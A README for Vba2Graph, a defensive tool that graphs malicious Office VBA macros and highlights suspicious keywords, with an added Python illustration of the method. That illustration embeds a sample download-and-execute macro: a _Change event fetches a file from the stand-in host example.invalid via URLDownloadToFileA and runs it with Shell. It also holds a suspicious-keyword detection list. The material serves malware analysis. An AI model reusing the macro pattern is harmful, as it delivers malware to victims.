Vba2Graph
A tool for security researchers who waste their time analyzing malicious Office macros.
Generates a VBA call graph with potentially malicious keywords highlighted.
Allows for quick analysis of malicious macros and easy understanding of their execution flow.
Features
- Keyword highlighting
- VBA Properties support
- External function declaration support
- Tricky macros with “_Change” execution triggers
- Fancy colour schemes!
Pros
✓ Pretty fast
✓ Works well on most malicious macros observed in the wild
Cons
✗ Static (dynamically resolved calls would not be recognized)
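As an added illustration of what the feature list above describes (example code written for this page, not the project's own), the following Python 3 script builds a miniature VBA call graph: it parses Sub/Function and external Declare definitions, marks `_Change`-style event handlers as entry points, draws edges to other procedures and to a keyword list, and emits Graphviz DOT. The sample macro and the keyword list are constructed for the example and are not the tool's own.

```python
import re
# Constructed sample macro in the README's "_Change trigger" style (not from any real document).
SAMPLE_VBA = """\
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal a As Long, ByVal u As String, ByVal f As String, ByVal c As Long, ByVal d As Long) As Long
Private Sub TextBox1_Change()
    Stage2 Environ("TEMP") & "\\x.exe"
End Sub
Private Sub Stage2(ByVal p As String)
    URLDownloadToFileA 0, "http://example.invalid/x", p, 0, 0
    Shell p, vbHide
End Sub
"""
# Illustrative highlight list, assumed here rather than taken from the tool.
SUSPICIOUS = {"Shell", "CreateObject", "GetObject", "Environ", "URLDownloadToFileA"}
PROC_RE = re.compile(r"\s*(?:Private\s+|Public\s+)?(Declare\s+)?(?:PtrSafe\s+)?(?:Sub|Function)\s+(\w+)", re.I)

def parse_procs(vba):
    """name -> (kind, body); kind: 'decl' (external Declare), 'event' (*_Change/_Resize/_Click) or 'proc'."""
    procs, current, body = {}, None, []
    for line in vba.splitlines():
        m = PROC_RE.match(line)
        if current is None and m:
            if m.group(1):                      # Declare line: record it, no body follows
                procs[m.group(2)] = ("decl", "")
            else:
                current, body = m.group(2), []
        elif current and re.match(r"\s*End\s+(?:Sub|Function)\b", line, re.I):
            kind = "event" if re.search(r"_(Change|Resize|Click)$", current, re.I) else "proc"
            procs[current], current = (kind, "\n".join(body)), None
        elif current:
            body.append(line)
    return procs

def build_graph(procs):
    """Static caller -> callee edges to known procedures and suspicious keywords (runtime-built names are missed)."""
    edges, flagged = set(), set()
    for name, (_, body) in procs.items():
        words = set(re.findall(r"\b[A-Za-z_]\w*", body))
        edges |= {(name, c) for c in set(procs) | SUSPICIOUS if c != name and c in words}
        flagged |= SUSPICIOUS & words
    return edges, flagged

def to_dot(procs, edges, flagged):
    """Graphviz source: triggers as double octagons, Declares as boxes, keywords filled red."""
    out = ["digraph vba {"]
    for n in sorted(set(procs) | flagged):
        shape = {"event": "doubleoctagon", "decl": "box"}.get(procs[n][0], "ellipse") if n in procs else "plaintext"
        out.append(f'  "{n}" [shape={shape}{", style=filled, fillcolor=red" if n in flagged else ""}];')
    out += [f'  "{a}" -> "{b}";' for a, b in sorted(edges)]
    return "\n".join(out + ["}"])
```

Feed the DOT text to `dot -Tpng` to render it; as with the tool itself, anything resolved at runtime (for example a procedure name assembled from strings) produces no edge.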
Installation
Install oletools:
https://github.com/decalage2/oletools/wiki/Install
Install the Python requirements:
pip2 install -r requirements.txt
Install Graphviz
Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add “dot.exe” to the PATH environment variable, or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin
Mac
brew install graphviz
Ubuntu
sudo apt-get install graphviz
Arch
sudo pacman -S graphviz
Usage
Only Python 2 is supported:
Output
You’ll get 4 folders in your output folder:
- png: the actual graph image you are looking for
- svg: same graph image, just in vector graphics
- dot: the dot file which was used to create the graph image
- bas: the VBA function code that the script recognized (for debugging)
Batch Processing
Mac/Linux:
The batch.sh script is included for running olevba and vba2graph on an input folder of malicious docs.
It deletes the output directory; use with caution.
Example 1:
Trickbot downloader: uses an object Resize event as the initial trigger, followed by TextBox_Change triggers.
Example 2:
Author: @MalwareCantFly
Source: https://github.com/MalwareCantFly/